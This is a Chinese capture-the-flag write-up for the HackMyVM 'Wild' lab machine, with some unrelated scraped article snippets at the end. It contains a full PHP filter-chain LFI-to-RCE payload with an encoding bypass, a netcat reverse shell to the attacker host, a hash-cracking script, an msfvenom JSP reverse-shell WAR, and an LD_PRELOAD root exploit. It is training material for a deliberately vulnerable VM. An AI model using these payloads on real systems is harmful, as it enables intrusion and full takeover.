[HackMyVM]靶场 Wild

kali:192.168.56.104

主机发现

arp-scan -l
# arp-scan -l   
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.56.104
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:05       (Unknown: locally administered)
192.168.56.100  08:00:27:6d:81:6c       PCS Systemtechnik GmbH
192.168.56.115  08:00:27:7e:15:a4       PCS Systemtechnik GmbH

靶机:192.168.56.115

nmap  192.168.56.115
# nmap 192.168.56.115       
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-06 11:11 CST
Nmap scan report for 192.168.56.115
Host is up (0.00040s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8080/tcp open  http-proxy
8443/tcp open  https-alt

开启了 22 80 8080 8443端口

扫一下目录

gobuster dir -u http://192.168.56.115 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirb/common.txt
/about.php            (Status: 200) [Size: 3]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.115/css/]
/fonts                (Status: 301) [Size: 316] [--> http://192.168.56.115/fonts/]
/images               (Status: 301) [Size: 317] [--> http://192.168.56.115/images/]
/index.php            (Status: 200) [Size: 19390]
/index.php            (Status: 200) [Size: 19390]
/js                   (Status: 301) [Size: 313] [--> http://192.168.56.115/js/]

有个php文件

fuzz一下参数

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u 'http://192.168.56.115/about.php?FUZZ=/etc/passwd' -fs 0

没爆出来

去界面探测一下信息

菜单里面只有recipes能点

注意url

http://192.168.56.115/recipe.php?file=fatty-burger.php

猜测可能有文件包含

禁止目录穿越

root:x:0:0:root:/root:/usr/bin/zsh daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin _apt:x:42:65534::/nonexistent:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin messagebus:x:100:107::/nonexistent:/usr/sbin/nologin avahi-autoipd:x:101:109:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin sshd:x:102:65534::/run/sshd:/usr/sbin/nologin dnsmasq:x:103:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin polkitd:x:996:996:polkit:/nonexistent:/usr/sbin/nologin tod:x:1002:1002:,,,:/home/tod:/bin/zsh

可以看到有root ,tod用户

伪协议成功读取

直接读取recipe.php读取不出来

用filter过滤器

http://192.168.56.115/recipe.php?file=php://filter/read=convert.base64-encode/resource=recipe.php

<!DOCTYPE html>
<html lang="fr">
<head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Food</title><link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css" /><link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css" /><link rel="stylesheet" href="css/flaticon.css" /><link rel="stylesheet" href="css/animate.css"><link rel="stylesheet" href="css/bootsnav.css"><link rel="stylesheet" href="css/color.css"><link rel="stylesheet" href="css/custom.css" />
</head>
<body data-spy="scroll" data-target="#navbar-menu" data-offset="100"><nav class="navbar navbar-default bootsnav no-background navbar-fixed black"><div class="container"><div class="navbar-header"><a class="navbar-brand" href="#"><img src="images/logo.png" class="logo" alt=""></a></div></div></nav><section id="block"><div class="container"><div class="row"><div class="col-md-8 col-md-offset-2"><div class="feature"><h1>Welcome !</h1><p style="color: red; font-weight: bold;font-size: 24px;">Choose a recipe :</p><ul class="list-group"><li class="list-group-item"><a href="?file=fatty-burger.php">Fatty Burger</a></li><li class="list-group-item"><a href="?file=shack-burger.php">Shack Burger</a></li><li class="list-group-item"><a href="?file=cheddar-burger.php">Cheddar Junky Stuffed Burgers</a></li></ul></div></div></div></div></section><script src="http://code.jquery.com/jquery-1.12.1.min.js"></script><script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js"></script><script src="js/bootsnav.js"></script>
</body>
</html><?php
ini_set('allow_url_include', '0');function isForbidden($input) {return stripos($input, "iconv") !== false;
}if(isset($_GET['file'])) {$file = $_GET['file'];if (isForbidden($file)) {echo "<div class='container'><div class='alert alert-danger'>Access denied !</div></div>";} elseif (strncmp($file, "/", 1) !== 0 && strncmp($file, "..", 2) !== 0) {@include($file);} else {echo "<div class='container'><div class='alert alert-danger'>Access denied !</div></div>";}
}
?>

得到的源码经过base64解码得到如上

看下面的php源码,知道网页对iconv,/,..进行了过滤

现在想想该如何利用LFI进行RCE

利用搜索引擎 搜索关键词LFI filter RCE得到两篇文章

通过 PHP 过滤器LFI2RCE - HackTricks

synacktiv/php_filter_chain_generator (github.com)

有个工具能生成php chain

php_filter_chain_generator.py
 python .\php_filter_chain_generator.py --chain '<?=`$_GET[0]` ?>'
[+] The following gadget chain will generate the following code : <?=`$_GET[0]` ?> (base64 value: PD89YCRfR0VUWzBdYCA/Pg)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp

又因为源码中过滤了iconv,可以进行双重编码绕过

i的16进制编码是%69,%的16进制编码是25,所以可以用%2569表示i

php://filter/convert.%2569conv.UTF8.CSISO2022KR|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.SE2.UTF-16|convert.%2569conv.CSIBM921.NAPLPS|convert.%2569conv.855.CP936|convert.%2569conv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.SE2.UTF-16|convert.%2569conv.CSIBM1161.IBM-932|convert.%2569conv.MS932.MS936|convert.%2569conv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.IBM869.UTF16|convert.%2569conv.L3.CSISO90|convert.%2569conv.UCS2.UTF-8|convert.%2569conv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.8859_3.UTF16|convert.%2569conv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CP367.UTF-16|convert.%2569conv.CSIBM901.SHIFT_JISX0213|convert.%2569conv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.INIS.UTF16|convert.%2569conv.CSIBM1133.IBM943|convert.%2569conv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CP861.UTF-16|convert.%2569conv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.865.UTF16|convert.%2569conv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.SE2.UTF-16|convert.%2569conv.CSIBM1161.IBM-932|convert.%2569conv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.INIS.UTF16|convert.%2569conv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CP861.UTF-16|convert.%2569conv.L4.GB13000|convert.%2569conv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.UTF8.UTF16LE|convert.%2569conv.UTF8.CSISO2022KR|convert.%2569conv.UCS2.UTF8|convert.%2569conv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.PT.UTF32|convert.%2569conv.KOI8-U.IBM-932|convert.%2569conv.SJIS.EUCJP-WIN|convert.%2569conv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CP367.UTF-16|convert.%2569conv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.PT.UTF32|convert.%2569conv.KOI8-U.IBM-932|convert.%2569conv.SJIS.EUCJP-WIN|convert.%2569conv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CP367.UTF-16|convert.%2569conv.CSIBM901.SHIFT_JISX0213|convert.%2569conv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CSIBM1161.UNICODE|convert.%2569conv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.ISO2022KR.UTF16|convert.%2569conv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.INIS.UTF16|convert.%2569conv.CSIBM1133.IBM943|convert.%2569conv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.SE2.UTF-16|convert.%2569conv.CSIBM1161.IBM-932|convert.%2569conv.MS932.MS936|convert.%2569conv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.base64-decode/resource=php://temp

payload:

http://192.168.56.115/recipe.php?file=php://filter/convert.%2569conv.UTF8.CSISO2022KR|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.SE2.UTF-16|convert.%2569conv.CSIBM921.NAPLPS|convert.%2569conv.855.CP936|convert.%2569conv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.SE2.UTF-16|convert.%2569conv.CSIBM1161.IBM-932|convert.%2569conv.MS932.MS936|convert.%2569conv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.IBM869.UTF16|convert.%2569conv.L3.CSISO90|convert.%2569conv.UCS2.UTF-8|convert.%2569conv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.8859_3.UTF16|convert.%2569conv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CP367.UTF-16|convert.%2569conv.CSIBM901.SHIFT_JISX0213|convert.%2569conv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.INIS.UTF16|convert.%2569conv.CSIBM1133.IBM943|convert.%2569conv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CP861.UTF-16|convert.%2569conv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.865.UTF16|convert.%2569conv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.SE2.UTF-16|convert.%2569conv.CSIBM1161.IBM-932|convert.%2569conv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.INIS.UTF16|convert.%2569conv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CP861.UTF-16|convert.%2569conv.L4.GB13000|convert.%2569conv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.UTF8.UTF16LE|convert.%2569conv.UTF8.CSISO2022KR|convert.%2569conv.UCS2.UTF8|convert.%2569conv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.PT.UTF32|convert.%2569conv.KOI8-U.IBM-932|convert.%2569conv.SJIS.EUCJP-WIN|convert.%2569conv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CP367.UTF-16|convert.%2569conv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.PT.UTF32|convert.%2569conv.KOI8-U.IBM-932|convert.%2569conv.SJIS.EUCJP-WIN|convert.%2569conv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CP367.UTF-16|convert.%2569conv.CSIBM901.SHIFT_JISX0213|convert.%2569conv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CSIBM1161.UNICODE|convert.%2569conv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.ISO2022KR.UTF16|convert.%2569conv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.INIS.UTF16|convert.%2569conv.CSIBM1133.IBM943|convert.%2569conv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.SE2.UTF-16|convert.%2569conv.CSIBM1161.IBM-932|convert.%2569conv.MS932.MS936|convert.%2569conv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.base64-decode/resource=php://temp&0=whoami

成功执行了命令

反弹个shell

nc+-e+/bin/bash+192.168.56.104+4567

切换到交互shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

拿到www-data的权限并没有什么卵用,里面啥也没有

这个时候就得看一下进程网段

ps auxww
tod          567  0.0  0.1   6932  3404 ?        S    04:06   0:00 /bin/bash /opt/wildfly/bin/wildfly.sh
tod          580  0.0  0.0   2576  1648 ?        S    04:07   0:00 /bin/sh /opt/wildfly/bin/standalone.sh -Djboss.bind.address.management=192.168.56.115 -b 192.168.56.115
tod          684  0.6  9.1 1395088 279568 ?      Sl   04:07   0:37 java -D[Standalone] -Xms64m -Xmx512m -XX:MetaspaceSize=96M -XX:MaxMetaspaceSize=256m -Djava.net.preferIPv4Stack=true -Djboss.modules.system.pkgs=org.jboss.byteman -Djava.awt.headless=true --add-exports=java.desktop/sun.awt=ALL-UNNAMED --add-exports=java.naming/com.sun.jndi.ldap=ALL-UNNAMED --add-exports=java.naming/com.sun.jndi.url.ldap=ALL-UNNAMED --add-exports=java.naming/com.sun.jndi.url.ldaps=ALL-UNNAMED --add-exports=jdk.naming.dns/com.sun.jndi.dns=ALL-UNNAMED --add-opens=java.base/java.lang=ALL-UNNAMED --add-opens=java.base/java.lang.invoke=ALL-UNNAMED --add-opens=java.base/java.lang.reflect=ALL-UNNAMED --add-opens=java.base/java.io=ALL-UNNAMED --add-opens=java.base/java.net=ALL-UNNAMED --add-opens=java.base/java.security=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED --add-opens=java.base/java.util.concurrent=ALL-UNNAMED --add-opens=java.management/javax.management=ALL-UNNAMED --add-opens=java.naming/javax.naming=ALL-UNNAMED -Djava.security.manager=allow -Dorg.jboss.boot.log.file=/opt/wildfly/standalone/log/server.log -Dlogging.configuration=file:/opt/wildfly/standalone/configuration/logging.properties -jar /opt/wildfly/jboss-modules.jar -mp /opt/wildfly/modules org.jboss.as.standalone -Djboss.home.dir=/opt/wildfly -Djboss.server.base.dir=/opt/wildfly/standalone -Djboss.bind.address.management=192.168.56.115 -b 192.168.56.115
ss -lutnp
ss -lutnp
Netid State  Recv-Q Send-Q  Local Address:Port Peer Address:PortProcess
udp   UNCONN 0      0             0.0.0.0:68        0.0.0.0:*          
tcp   LISTEN 0      4096   192.168.56.115:8080      0.0.0.0:*          
tcp   LISTEN 0      50     192.168.56.115:9990      0.0.0.0:*          
tcp   LISTEN 0      128           0.0.0.0:22        0.0.0.0:*          
tcp   LISTEN 0      4096   192.168.56.115:8443      0.0.0.0:*          
tcp   LISTEN 0      128              [::]:22           [::]:*          
tcp   LISTEN 0      511                 *:80              *:*    

看看其他端口

8443打不开

8080

是WildFly服务后台是9990端口

根据进程扫描知道wildfly文件位置/opt/wildfly

扫一下隐私文件

find . -name *user* 2>/dev/null
find . -name *user* 2>/dev/null
./.galleon/hashes/modules/system/layers/base/org/jboss/as/domain-add-user
./standalone/configuration/application-users.properties
./standalone/configuration/mgmt-users.properties
./modules/system/layers/base/org/wildfly/security/elytron-base/main/wildfly-elytron-sasl-localuser-2.2.2.Final.jar
./modules/system/layers/base/org/jboss/as/domain-add-user
./docs/schema/user-roles_1_0.xsd
./bin/add-user.properties
./bin/add-user.sh
./bin/add-user.bat
./bin/add-user.ps1
./domain/configuration/application-users.properties
./domain/configuration/mgmt-users.properties
www-data@wild:/opt/wildfly/domain/configuration$ cat applica*   
cat applica*
cat: application-roles.properties: Permission denied
cat: application-users.properties: Permission denied
www-data@wild:/opt/wildfly/domain/configuration$ cat mgmt*
cat mgmt*
cat: mgmt-groups.properties: Permission denied
#
# Properties declaration of users for the realm 'ManagementRealm' which is the default realm
# for new installations. Further authentication mechanism can be configured
# as part of the <management /> in host.xml.
#
# Users can be added to this properties file at any time, updates after the server has started
# will be automatically detected.
#
# By default the properties realm expects the entries to be in the format: -
# username=HEX( MD5( username ':' realm ':' password))
#
# A utility script is provided which can be executed from the bin folder to add the users: -
# - Linux
#  bin/add-user.sh
#
# - Windows
#  bin\add-user.bat
#
#$REALM_NAME=ManagementRealm$ This line is used by the add-user utility to identify the realm name already used in this file.
#
# On start-up the server will also automatically add a user $local - this user is specifically
# for local tools running against this AS installation.
#
# The following illustrates how an admin user could be defined, this
# is for illustration only and does not correspond to a usable password.
#
administrator=3bfa7f34174555fe766d0e0295821742

 在/domain/configuration/mgmt-users.properties里面发现点东西

username为realm然后再对username:realm:password进行md5加密再转16进制

从下面可以知道用户名为administrator

hash为3bfa7f34174555fe766d0e0295821742

在host-primary.xml里面发现realm name为ManagementRealm

<realm name="ManagementRealm" role-decoder="groups-to-roles"/>

现在可以写个脚本来碰撞一下

import hashlib
username="administrator"
realm="ManagementRealm"
hash_re="3bfa7f34174555fe766d0e0295821742"
with open("/usr/share/eaphammer/wordlists/rockyou.txt",'r',errors="ignore") as file:for passwd in file:passwd=passwd.strip()if hashlib.md5(f"{username}:{realm}:{passwd}".encode()).hexdigest()==hash_re:print(passwd)break
# python a.py
katarina9

爆出密码是katarina9

成功登录上去

上传war文件反弹shell

生成一个

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.56.104 LPORT=4567 -f war > tao.war Scripting Payloads

监听拿到shell

# nc -lvnp 4567          
listening on [any] 4567 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.115] 51206
whoami
tod

拿到user权限

sudo -l查看提权文件

tod@wild:/home/tod$ sudo -l
sudo -l
Matching Defaults entries for tod on wild:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,use_ptyUser tod may run the following commands on wild:(ALL : ALL) SETENV: NOPASSWD: /usr/bin/info

可以通过setenv进行链接库注入

通过LD_PRELOAD在库进行加载的时候添加可以使用的函数

写个c

#include <stdio.h>
#include <stdlib.h>
__attribute__((constructor))
void init()
{setuid(0);setgid(0);unsetenv("LD_PRELOAD");system("/bin/bash");
}

编译

 gcc root.c -shared -fPIC -o root.so

传到靶机

wget http://192.168.56.104:6677/root.so
chmod +x root.so
sudo LD_PRELOAD=/home/tod/root.so /usr/bin/info
wget http://192.168.56.104:6677/root.so
--2024-03-06 06:51:01--  http://192.168.56.104:6677/root.so
Connecting to 192.168.56.104:6677... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15520 (15K) [application/octet-stream]
Saving to: ‘root.so’root.so             100%[===================>]  15.16K  --.-KB/s    in 0.003s  2024-03-06 06:51:01 (5.33 MB/s) - ‘root.so’ saved [15520/15520]tod@wild:/home/tod$ chmod +x root.so
chmod +x root.so
tod@wild:/home/tod$ sudo LD_PRELOAD=/home/tod/root.so /usr/bin/info
sudo LD_PRELOAD=/home/tod/root.so /usr/bin/info
root@wild:/home/tod# whoami
whoami
root
root@wild:/home/tod# ^[^A

拿到root权限!

总结:1.php链从LFI2RCE

        2.进程查看文件目录

        3.war马上传实现webshell

        4.setenv链接库注入提权

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/727121.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Win11黑屏只有鼠标该怎么处理?

作者&#xff1a;Buzhiming User 链接&#xff1a;https://www.zhihu.com/question/472508581/answer/2275715047 来源&#xff1a;知乎 著作权归作者所有。商业转载请联系作者获得授权&#xff0c;非商业转载请注明出处。 方法1.手动启用explorer&#xff1a;CTRLshiftesc打开…

从安卓转战月薪6万的鸿蒙原来这么简单

近年来&#xff0c;各家大厂正在积极布局鸿蒙客户端开发&#xff0c;鸿蒙操作系统备受瞩目&#xff0c;不少安卓开发者纷纷转战鸿蒙&#xff0c;并取得了可观的经济回报。本文将为大家揭示&#xff0c;从安卓转战鸿蒙并获得月薪6万的简单之道&#xff0c;希望能给正在考虑转型的…

YOLOSHOW - YOLOv5 / YOLOv7 / YOLOv8 / YOLOv9 基于 Pyside6 的图形化界面

YOLOSHOW 是一个基于 PySide6&#xff08;Qt for Python&#xff09;开发的图形化界面应用程序&#xff0c;主要用于集成和可视化YOLO系列&#xff08;包括但不限于YOLOv5、YOLOv7、YOLOv8、YOLOv9&#xff09;的目标检测模型。YOLOSHOW 提供了一个用户友好的交互界面&#xff…

POS 之 最终确定性

Gasper Casper 是一种能将特定区块更新为 最终确定 状态的机制&#xff0c;使网络的新加入者确信他们正在同步规范链。当区块链出现多个分叉时&#xff0c;分叉选择算法使用累计投票来确保节点可以轻松选择正确的分叉。 最终确定性 最终确定性是某些区块的属性&#xff0c;意味…

vue3+ts+vite项目使用 unplugin-auto-import (自动导入)

该项目是基于vite创建的 vue3 ts vue-router pinia项目; 启动项目&#xff1a; npm install npm run dev启动后遇到了以下问题&#xff1a; 问题1&#xff1a; Component name "Person" should always be multi-word. eslint(vue/multi-word-component-names)…

layui柱状图tooltip获取x轴和y轴数据

核心代码 formatter: function (params) {var xValue params[0].axisValue; // 获取x轴数值var yValue params[0].value; // 获取y轴数值var str "x轴数值&#xff1a;" xValue "<br/>" "y轴数值&#xff1a;" yValue;return str;…

STM32day1

个人暂时的学后感&#xff0c;不一定对&#xff0c;没什么东西&#xff0c;为做项目奔波中。。。 1.总结keil5下载代码和编译代码需要注意的事项 下载代码&#xff1a; 从STM32CobeMX里面加载的文件会在左边栏添加对应的文件&#xff0c;下载前要先编译一下&#xff0c;不报错…

Ajax、Axios、Vue、Element与其案例

目录 一.Ajax 二.Axios 三.Vue 四.Element 五.增删改查案例 一.依赖&#xff1a;数据库&#xff0c;mybatis&#xff0c;servlet&#xff0c;json-对象转换器 二.资源&#xff1a;elementvueaxios 三.pojo 四.mapper.xml与mapper接口 五.service 六.servlet 七.html页…

1909_Arm Cortex-M3编程模型

1909_Arm Cortex-M3编程模型 全部学习汇总&#xff1a; g_arm_cores: ARM内核的学习笔记 (gitee.com) 编程模型的部分除了单独的核心寄存器描述之外&#xff0c;它还包含有关处理器模式和软件执行和堆栈的特权级别的信息。 处理器有两种模式&#xff0c;分别是线程模式和Handle…

揭秘CPU可视化:探索计算机心脏的神秘之旅

在数字化飞速发展的今天&#xff0c;中央处理器&#xff08;CPU&#xff09;作为计算机的心脏&#xff0c;其复杂度和重要性不言而喻。 中央处理器&#xff0c;这个小小的芯片&#xff0c;却承载着计算机运行的所有指令和数据处理任务。它的内部构造复杂而精密&#xff0c;每一…

antd-select组件样式,option下拉选中勾选样式,使用Drawer样式失效

注意&#xff1a;如果在使用抽屉Drawer组件时&#xff0c;在less写法中修改下拉样式ant-select-dropdown-menu不生效&#xff01;检查是否设置Drawer组件getContainer属性是否为false 原因&#xff1a; getContainer 属性决定了 Drawer 渲染的 HTML 节点位置&#xff0c;默认情…

哪些公司在招聘GIS开发?为什么?

之前我们给大家整理汇总了WebGIS在招岗位的一些特点&#xff0c;包括行业、学历、工作经验等。WebGIS招聘原来看重这个&#xff01;整理了1300多份岗位得出来的干货&#xff01; 很多同学好奇&#xff0c;这些招GIS开发的都是哪些公司&#xff1f;主要是做什么的&#xff1f; …

